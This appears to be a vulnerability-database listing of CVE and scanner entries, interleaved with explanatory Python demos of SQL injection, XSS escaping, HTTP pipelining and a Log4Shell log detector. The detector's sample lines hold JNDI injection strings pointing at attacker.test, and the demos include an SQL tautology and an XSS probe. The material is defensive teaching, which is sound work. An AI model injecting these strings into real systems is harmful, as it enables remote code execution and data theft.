Tussendoor Internet & Marketing Security Vulnerabilities

[nvd] CVE-2023-5695
A vulnerability was found in CodeAstro Internet Banking System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file pages_reset_pwd.php. The manipulation of the argument email with the input testing%40example.com'%26%25alert(9860) leads...
CVSS 6.1 | AI Score 4.5 | EPSS 0.001 | 2023-10-22 11:15 PM

[nvd] CVE-2023-5693
A vulnerability was found in CodeAstro Internet Banking System 1.0 and classified as critical. This issue affects some unknown processing of the file pages_reset_pwd.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been...
CVSS 9.8 | AI Score 7.4 | EPSS 0.001 | 2023-10-22 11:15 PM

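The two CodeAstro entries above hinge on the same untrusted email argument of pages_reset_pwd.php reaching a SQL statement. As an added illustration (this is not CodeAstro's code; the table, the column names and the tautology string are constructed here), the following Python compares a lookup built by string concatenation with a parameterised one. The probe string from CVE-2023-5695, URL-decoded, carries a single quote, and the last function shows that the quote alone breaks the concatenated statement, which is the error signal a tester looks for before trying a tautology like the one the SQL-injection entry describes.

```python
import sqlite3
from typing import List
from urllib.parse import unquote

# Constructed sample table; the real application's schema is not on this page.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, reset_token TEXT)")
    conn.executemany(
        "INSERT INTO users (email, reset_token) VALUES (?, ?)",
        [("alice@example.test", "tok-alice"), ("bob@example.test", "tok-bob")],
    )
    return conn

def lookup_concatenated(conn: sqlite3.Connection, email: str) -> List[str]:
    """Vulnerable pattern: the attacker-controlled value becomes part of the SQL text."""
    sql = "SELECT email FROM users WHERE email = '" + email + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_parameterized(conn: sqlite3.Connection, email: str) -> List[str]:
    """Fixed pattern: the value is bound, so quotes and keywords in it are just data."""
    return [row[0] for row in conn.execute("SELECT email FROM users WHERE email = ?", (email,))]

def probe_breaks_statement(conn: sqlite3.Connection, email: str, parameterized: bool) -> bool:
    """True if the lookup raises a SQL error for this input (the classic injection tell)."""
    try:
        (lookup_parameterized if parameterized else lookup_concatenated)(conn, email)
        return False
    except sqlite3.Error:
        return True

# Probe from the CVE-2023-5695 entry, URL-decoded; the single quote is the important character.
PROBE = unquote("testing%40example.com'%26%25alert(9860)")

# Generic tautology (a textbook string, not a payload taken from the CodeAstro advisory).
TAUTOLOGY = "x' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("probe breaks concatenated statement:", probe_breaks_statement(db, PROBE, False))
    print("concatenated + tautology:", lookup_concatenated(db, TAUTOLOGY))
    print("parameterized + tautology:", lookup_parameterized(db, TAUTOLOGY))
```

The concatenated lookup returns every row for the tautology and throws a syntax error for the probe; the parameterised lookup returns nothing for either, because the driver never interprets the value as SQL.
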
[osv] CVE-2023-0846
Unauthenticated, stored cross-site scripting in the display of alarm reduction keys in multiple versions of OpenNMS Horizon and Meridian could allow an attacker access to confidential session information. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and Horizon...
CVSS 6.7 | AI Score 6.1 | EPSS 0.001 | 2023-02-22 07:15 PM

[githubexploit] Exploit for Code Injection in Crushftp
CVE-2024-4040: CrushFTP File Read Vulnerability Overview...
CVSS 10 | AI Score 9.5 | EPSS 0.966 | 2024-05-01 02:42 PM

[cve] CVE-2024-20869
Improper privilege management vulnerability in Samsung Internet prior to version 25.0.0.41 allows local attackers to bypass protection for...
CVSS 5.5 | AI Score 6.7 | EPSS 0.0004 | 2024-05-07 05:15 AM

[nessus] Apache Log4Shell RCE detection via callback correlation (Direct Check SSH)
The remote host appears to be running SSH. SSH itself is not vulnerable to Log4Shell; however, the SSH server could potentially be affected if it attempts to log data via a vulnerable log4j library. This plugin requires that both the scanner and target machine have internet...
AI Score 4 | 2021-12-17 12:00 AM

[githubexploit] Exploit for CVE-2023-38831
CVE-2023-38831 Winrar Exploit Generator (POC) This is a basic...
CVSS 7.8 | AI Score 8.6 | EPSS 0.192 | 2023-08-30 07:55 PM

[osv] CVE-2024-32977
OctoPrint provides a web interface for controlling consumer 3D printers. OctoPrint versions up until and including 1.10.0 contain a vulnerability that allows an unauthenticated attacker to completely bypass the authentication if the autologinLocal option is enabled within config.yaml, even if they....
CVSS 7.1 | AI Score 6.8 | EPSS 0.0004 | 2024-05-14 04:17 PM

[osv] CVE-2023-0867
Multiple stored and reflected cross-site scripting vulnerabilities in webapp jsp pages in multiple versions of OpenNMS Meridian and Horizon could allow an attacker access to confidential session information. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and...
CVSS 6.7 | AI Score 6.2 | EPSS 0.001 | 2023-02-23 03:15 PM

[githubexploit] Exploit for CVE-2024-23692
Rejetto HFS (HTTP File Server) CVE-2024-23692 Vulnerability...
CVSS 9.8 | AI Score 10 | EPSS 0.002 | 2024-06-14 01:33 AM

[nessus] Apache Log4Shell RCE detection via callback correlation (Direct Check MSRPC)
The remote host appears to be running MSRPC. MSRPC itself is not vulnerable to Log4Shell; however, the MSRPC server could potentially be affected if it attempts to log data via a vulnerable log4j library. This plugin requires that both the scanner and target machine have internet...
AI Score 3.9 | 2022-01-12 12:00 AM

[wired] Ransomware Attacks Are Getting Worse
Plus: US lawmakers have nothing to say about an Israeli influence campaign aimed at US voters, a former LA Dodgers owner wants to fix the internet, and...
AI Score 7.2 | 2024-06-15 10:30 AM

[osv] CVE-2023-0815
Potential Insertion of Sensitive Information into Jetty Log Files in multiple versions of OpenNMS Meridian and Horizon could allow disclosure of usernames and passwords if the logging level is set to debug. Users should upgrade to Meridian 2023.1.0 or newer, or Horizon 31.0.4. Meridian and Horizon....
CVSS 6.8 | AI Score 6.5 | EPSS 0.001 | 2023-02-23 03:15 PM

[osv] CVE-2023-40314
Cross-site scripting in bootstrap.jsp in multiple versions of OpenNMS Meridian and Horizon allows an attacker access to confidential session information. The solution is to upgrade to Horizon 32.0.5 or newer and Meridian 2023.1.9 or newer Meridian and Horizon installation instructions state that...
CVSS 6.1 | AI Score 6.5 | EPSS 0.0005 | 2023-11-16 10:15 PM

[cve] CVE-2024-37182
Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...
CVSS 4.7 | AI Score 4.9 | EPSS 0.0004 | 2024-06-14 09:15 AM

[nvd] CVE-2024-37182
Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...
CVSS 4.7 | EPSS 0.0004 | 2024-06-14 09:15 AM

[githubexploit] Exploit for Out-of-bounds Write in Openssl
2022 OpenSSL vulnerability -...
AI Score 7 | 2022-10-28 09:51 AM

[osv] CVE-2023-46137
Twisted is an event-based framework for internet applications. Prior to version 23.10.0rc1, when sending multiple HTTP requests in one TCP packet, twisted.web will process the requests asynchronously without guaranteeing the response order. If one of the endpoints is controlled by an attacker, the....
CVSS 5.3 | AI Score 7 | EPSS 0.0005 | 2023-10-25 09:15 PM

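The Twisted entry above describes a pipelining bug: two requests arrive in one TCP segment, the server handles them concurrently, and whichever finishes first is written first, so a slow attacker-controlled endpoint can make the client receive the wrong response for its request. The following asyncio sketch is an added example, not Twisted's code and not its fix; the pipelined packet and the per-path latencies are constructed here. It contrasts writing responses on completion with keeping the handlers concurrent but flushing responses strictly in request order.

```python
import asyncio
from typing import Dict, List

# Constructed sample: two pipelined HTTP/1.1 requests in one TCP segment.
PIPELINED_PACKET = (
    b"GET /slow HTTP/1.1\r\nHost: example.test\r\n\r\n"
    b"GET /fast HTTP/1.1\r\nHost: example.test\r\n\r\n"
)

# Hypothetical per-path latency in seconds; /slow stands in for an endpoint
# whose response time the attacker controls.
LATENCY: Dict[str, float] = {"/slow": 0.05, "/fast": 0.0}

def split_requests(packet: bytes) -> List[str]:
    """Return the request-target of each request in a pipelined packet."""
    targets = []
    for raw in packet.split(b"\r\n\r\n"):
        if not raw.strip():
            continue
        request_line = raw.split(b"\r\n", 1)[0].decode("ascii")
        targets.append(request_line.split(" ")[1])
    return targets

async def handle(path: str) -> str:
    """Toy handler: waits for the configured latency, then answers with the path."""
    await asyncio.sleep(LATENCY.get(path, 0.0))
    return f"HTTP/1.1 200 OK\r\nContent-Length: {len(path)}\r\n\r\n{path}"

async def serve_unordered(packet: bytes) -> List[str]:
    """Vulnerable pattern: each response is written the moment its handler finishes."""
    written: List[str] = []

    async def run(path: str) -> None:
        written.append(await handle(path))

    await asyncio.gather(*(run(p) for p in split_requests(packet)))
    return written

async def serve_ordered(packet: bytes) -> List[str]:
    """Fixed pattern: handlers still run concurrently, but the socket is written
    only in request order, so a slow first handler holds back later responses."""
    tasks = [asyncio.create_task(handle(p)) for p in split_requests(packet)]
    written: List[str] = []
    for task in tasks:
        written.append(await task)
    return written

def response_order(packet: bytes, ordered: bool) -> List[str]:
    """Body of each response in the order it would reach the client."""
    responses = asyncio.run(serve_ordered(packet) if ordered else serve_unordered(packet))
    return [r.rsplit("\r\n\r\n", 1)[1] for r in responses]

if __name__ == "__main__":
    print("unordered:", response_order(PIPELINED_PACKET, ordered=False))
    print("ordered:  ", response_order(PIPELINED_PACKET, ordered=True))
```

The unordered server returns the /fast body first, which a pipelining client would attribute to its /slow request; the ordered server returns /slow then /fast. Serialising the writes rather than the handlers keeps the throughput benefit of concurrency without the mismatch.
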
[vulnrichment] CVE-2024-37182 Lack of permissions prompting when opening external URLs
Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...
CVSS 4.7 | AI Score 7.1 | EPSS 0.0004 | 2024-06-14 08:39 AM

[cvelist] CVE-2024-37182 Lack of permissions prompting when opening external URLs
Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI...
CVSS 4.7 | EPSS 0.0004 | 2024-06-14 08:39 AM

[cve] CVE-2023-21683
Windows Internet Key Exchange (IKE) Extension Denial of Service...
CVSS 7.5 | AI Score 7.4 | EPSS 0.008 | 2023-01-10 10:15 PM

[osv] CVE-2023-38505
DietPi-Dashboard is a web dashboard for the operating system DietPi. The dashboard only allows for one TLS handshake to be in process at a given moment. Once a TCP connection is established in HTTPS mode, it will assume that it should be waiting for a handshake, and will stay this way indefinitely....
CVSS 7.5 | AI Score 7 | EPSS 0.001 | 2023-07-27 07:15 PM

[cvelist] CVE-2024-27974
Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc......
AI Score 6.8 | EPSS 0.0004 | 2024-03-18 07:59 AM

[cve] CVE-2024-27974
Cross-site request forgery vulnerability in FUJIFILM printers which implement CentreWare Internet Services or Internet Services allows a remote unauthenticated attacker to alter user information. In the case the user is an administrator, the settings such as the administrator's ID, password, etc......
AI Score 6.8 | EPSS 0.0004 | 2024-03-18 08:15 AM

[githubexploit] Exploit for Embedded Malicious Code in Tukaani Xz
CVE-2024-3094 Basic POC to test CVE-2024-3094 vulnerability...
CVSS 10 | AI Score 7.5 | EPSS 0.133 | 2024-06-11 02:19 PM

[osv] CVE-2023-38510
Tolgee is an open-source localization platform. Starting in version 3.14.0 and prior to version 3.23.1, when a request is made using an API key, the backend fails to verify the permission scopes associated with the key, effectively bypassing permission checks entirely for some endpoints. It's...
CVSS 8.1 | AI Score 6.8 | EPSS 0.001 | 2023-07-27 07:15 PM

[openvas] Crestron Device Detection (CIP)
Crestron Internet Protocol (CIP) based detection of Crestron ...
AI Score 7.3 | 2018-08-14 12:00 AM

[nessus] Ivanti Policy Secure 9.x / 22.x SSRF-RCE Chain (CVE-2024-21893)
The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests to cause unauthorized...
CVSS 8.2 | AI Score 7.1 | EPSS 0.961 | 2024-02-06 12:00 AM

[osv] CVE-2023-36463
Meldekarten generator is an open source project to create a program, running locally in the browser without the need for an internet-connection, to create, store and print registration cards for volunteers. All text fields on the webpage are vulnerable to XSS attacks. The user input isn't (fully).....
CVSS 6.1 | AI Score 6.1 | EPSS 0.001 | 2023-06-27 08:15 PM

[osv] CVE-2022-39348
Twisted is an event-based framework for internet applications. Starting with version 0.9.4, when the host header does not match a configured host twisted.web.vhost.NameVirtualHost will return a NoResource resource which renders the Host header unescaped into the 404 response allowing HTML and...
CVSS 5.4 | AI Score 5.4 | EPSS 0.002 | 2022-10-26 08:15 PM

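Both the CodeAstro XSS entry (CVE-2023-5695, with its email probe) and the Twisted NameVirtualHost entry just above (CVE-2022-39348, the Host header echoed into a 404 body) are the same defect: a request value written into HTML without escaping. The Python below is an added example, not code from either project; the hostile Host value and the page fragments are constructed here. It renders each value unescaped and escaped and checks whether the raw input survives into the output.

```python
import html
from urllib.parse import unquote

# Probe string from the CVE-2023-5695 entry, URL-decoded: testing@example.com'&%alert(9860)
PROBE = unquote("testing%40example.com'%26%25alert(9860)")

# Constructed hostile Host header value for the NameVirtualHost case (not from the advisory).
HOSTILE_HOST = 'evil.test"><script>alert(1)</script>'

def reset_notice(email: str, escape: bool) -> str:
    """Page fragment echoing the submitted email, unescaped or escaped."""
    shown = html.escape(email, quote=True) if escape else email
    return "<p>A reset link was sent to " + shown + "</p>"

def not_found_page(host: str, escape: bool) -> str:
    """404 body echoing the Host header, as the Twisted entry describes for an unmatched vhost."""
    shown = html.escape(host, quote=True) if escape else host
    return "<html><body><h1>404 Not Found</h1><p>No such host: " + shown + "</p></body></html>"

def reflected_verbatim(rendered: str, user_input: str) -> bool:
    """True if the raw input, quotes and angle brackets included, reached the HTML unchanged."""
    return user_input in rendered

if __name__ == "__main__":
    for value, render in ((PROBE, reset_notice), (HOSTILE_HOST, not_found_page)):
        print("unescaped:", render(value, escape=False))
        print("escaped:  ", render(value, escape=True))
```

html.escape with quote=True turns the probe's apostrophe into &#x27; and its ampersand into &amp;, and the Host value's angle brackets into &lt; and &gt;, so neither input can close the surrounding text node or attribute. The escaping has to happen at the point of output, for every reflected value, including ones most people never think of as user input, such as the Host header.
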
[nessus] Kaspersky Multiple Products 'Bases' Directory Insecure Permissions
The version of either Kaspersky Anti-Virus or Kaspersky Internet Security installed on the remote host has a local privilege escalation vulnerability. The Everyone group has Full Control rights to the 'Bases' directory. This directory contains antivirus bases, configuration files, and executable...
AI Score 3.1 | 2010-01-06 12:00 AM

[nessus] Ivanti Connect Secure 9.x / 22.x SSRF-RCE Chain (CVE-2024-21893)
The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests to cause unauthorized.....
CVSS 8.2 | AI Score 7.1 | EPSS 0.961 | 2024-02-06 12:00 AM

[nessus] Ivanti Connect Secure 9.x / 22.x Command Injection Vulnerability (CVE-2024-21887)
The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and execute arbitrary commands...
CVSS 9.1 | AI Score 9.4 | EPSS 0.969 | 2024-02-02 12:00 AM

[nessus] Ivanti Policy Secure 9.x / 22.x Command Injection Vulnerability (CVE-2024-21887)
The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a command injection vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and execute arbitrary commands on.....
CVSS 9.1 | AI Score 9.4 | EPSS 0.969 | 2024-02-02 12:00 AM

[wpvulndb] WP ULike < 2.7.0 - Authenticated (Subscriber+) Stored Cross-Site Scripting
Description The WP ULike – Most Advanced WordPress Marketing Toolkit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a user's display name in all versions up to, and including, 4.6.9 due to insufficient input sanitization and output escaping. This makes it possible for...
CVSS 6.4 | AI Score 5.7 | EPSS 0.0004 | 2024-04-26 12:00 AM

[githubexploit] Exploit for Code Injection in Citrix Netscaler Application Delivery Controller
CVE-2023-3519 Inspector The cve_2023_3519_inspector.py is...
AI Score 7 | 2023-07-20 04:05 PM

[nessus] Ivanti Policy Secure 9.x / 22.x SSRF (CVE-2024-21893)
The Ivanti Policy Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Policy Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and have the server...
CVSS 8.2 | AI Score 7.5 | EPSS 0.961 | 2024-02-06 12:00 AM

[nessus] Ivanti Connect Secure 9.x / 22.x SSRF (CVE-2024-21893)
The Ivanti Connect Secure installed on the remote host is 9.x or 22.x. It is, therefore, affected by a server-side request forgery vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) which allows an unauthenticated attacker to send specially crafted requests and have the server...
CVSS 8.2 | AI Score 7 | EPSS 0.961 | 2024-02-06 12:00 AM

[cve] CVE-2022-34721
Windows Internet Key Exchange (IKE) Protocol Extensions Remote Code Execution...
CVSS 9.8 | AI Score 9.5 | EPSS 0.011 | 2022-09-13 07:15 PM

In Wild
[packetstorm]
AI Score 7.4 | EPSS 0.0004 | 2024-06-10 12:00 AM

[nessus] MobileIron Core Log4Shell Direct Check (CVE-2021-44228)
A remote code execution vulnerability exists in MobileIron Core in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via.....
CVSS 10 | AI Score 2.3 | EPSS 0.976 | 2022-01-21 12:00 AM

[osv] CVE-2023-29010
Budibase is a low code platform for creating internal tools, workflows, and admin panels. Versions prior to 2.4.3 (07 March 2023) are vulnerable to Server-Side Request Forgery. This can lead to an attacker gaining access to a Budibase AWS secret key. Users of Budibase cloud need to take no action.....
CVSS 6.5 | AI Score 7 | EPSS 0.001 | 2023-04-06 05:15 PM

[osv] CVE-2024-23838
TrueLayer.NET is the .Net client for TrueLayer. The vulnerability could potentially allow a malicious actor to gain control over the destination URL of the HttpClient used in the API classes. For applications using the SDK, requests to unexpected resources on local networks or to the internet...
CVSS 7.5 | AI Score 8.4 | EPSS 0.001 | 2024-01-30 05:15 PM

[nessus] VMware Horizon Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)
A remote code execution vulnerability exists in VMware Horizon in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can exploit this, via.....
CVSS 10 | AI Score 1.7 | EPSS 0.976 | 2022-01-07 12:00 AM

[nvd] CVE-2023-40282
Improper authentication vulnerability in Rakuten WiFi Pocket all versions allows a network-adjacent attacker to log in to the product's Management Screen. As a result, sensitive information may be obtained and/or the settings may be...
CVSS 5.4 | AI Score 5.4 | EPSS 0.0004 | 2023-08-23 04:15 AM

[redhat] (RHSA-2024:3271) Important: bind and dhcp security update
The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) protocols. BIND includes a DNS server (named); a resolver library (routines for applications to use when interfacing with DNS); and tools for verifying that the DNS server is operating correctly. The...
AI Score 7.2 | EPSS 0.05 | 2024-05-22 10:41 AM

[cve] CVE-2023-40282
Improper authentication vulnerability in Rakuten WiFi Pocket all versions allows a network-adjacent attacker to log in to the product's Management Screen. As a result, sensitive information may be obtained and/or the settings may be...
CVSS 5.4 | AI Score 5.3 | EPSS 0.0004 | 2023-08-23 04:15 AM

[nessus] VMware vRealize Operations Manager Log4Shell Direct Check (CVE-2021-44228) (VMSA-2021-0028)
A remote code execution vulnerability exists in VMWare vRealize Operations Manager in the bundled Apache Log4j logging library. Apache Log4j is vulnerable due to insufficient protections on message lookup substitutions when dealing with user controlled input. A remote, unauthenticated attacker can....
CVSS 10 | AI Score 2.4 | EPSS 0.976 | 2022-01-21 12:00 AM

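The Log4Shell entries on this page (the SSH and MSRPC callback-correlation checks and the MobileIron, VMware Horizon and vRealize direct checks) all rest on the same mechanism: Log4j performs lookup substitution on message text, so a ${jndi:...} string in any logged field triggers an outbound JNDI request. The callback checks detect that request from the outside; the complementary log-side check below is an added example, not Tenable's plugin logic, run over constructed access-log lines. It undoes URL encoding and the nested lower/upper and default-value lookups attackers use to hide the literal ${jndi: token, then reports the line and the JNDI scheme. Only traffic that actually reached a log is visible this way, which is why the scanner-side callback check exists.

```python
import re
from typing import List, Tuple
from urllib.parse import unquote

# Constructed sample access-log lines (not from any real host); the last one is URL-encoded.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "User-Agent: ${jndi:ldap://attacker.test/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "User-Agent: ${${lower:j}ndi:${lower:l}dap://attacker.test/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "User-Agent: ${${env:NOPE:-j}ndi:rmi://attacker.test/c}"',
    '10.0.0.8 - - "GET /index.html HTTP/1.1" 200 "User-Agent: Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "X-Api-Version: %24%7Bjndi%3Adns%3A%2F%2Fattacker.test%2Fd%7D"',
]

# Innermost lookups, i.e. ones with no further "${" inside them.
CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}$]*)\}", re.IGNORECASE)
# ${anything:anything:-DEFAULT} evaluates to DEFAULT when the lookup fails, as it does here.
DEFAULT_LOOKUP = re.compile(r"\$\{[^{}$:]*:[^{}$]*?:-([^{}$]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

def normalize(line: str) -> str:
    """Undo URL encoding and collapse obfuscating lookups, innermost first, until stable."""
    text = unquote(line)
    for _ in range(10):  # bounded: each pass strips one nesting level
        collapsed = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        collapsed = DEFAULT_LOOKUP.sub(lambda m: m.group(1), collapsed)
        if collapsed == text:
            break
        text = collapsed
    return text.lower()

def detect(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, JNDI scheme) for every line that carries a lookup after normalisation."""
    hits = []
    for i, line in enumerate(lines):
        m = JNDI.search(normalize(line))
        if m:
            hits.append((i, m.group(1).lower()))
    return hits

if __name__ == "__main__":
    for index, scheme in detect(SAMPLE_LOGS):
        print(f"line {index}: jndi scheme {scheme}")
```

Normalising before matching is the point: a pattern for the literal ${jndi: misses three of the four hostile lines above. The scheme is worth keeping because ldap and rmi attempts carry a remote class load, whereas dns-only probes are usually reconnaissance for which hosts will resolve attacker names.
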
[cvelist] CVE-2024-20869
Improper privilege management vulnerability in Samsung Internet prior to version 25.0.0.41 allows local attackers to bypass protection for...
CVSS 5.5 | AI Score 5.8 | EPSS 0.0004 | 2024-05-07 04:28 AM

[openvas] Fedora: Security Advisory for seamonkey (FEDORA-2021-df093b89ba)
The remote host is missing an update for...
AI Score 7.5 | 2021-04-07 12:00 AM

Total number of security vulnerabilities: 73882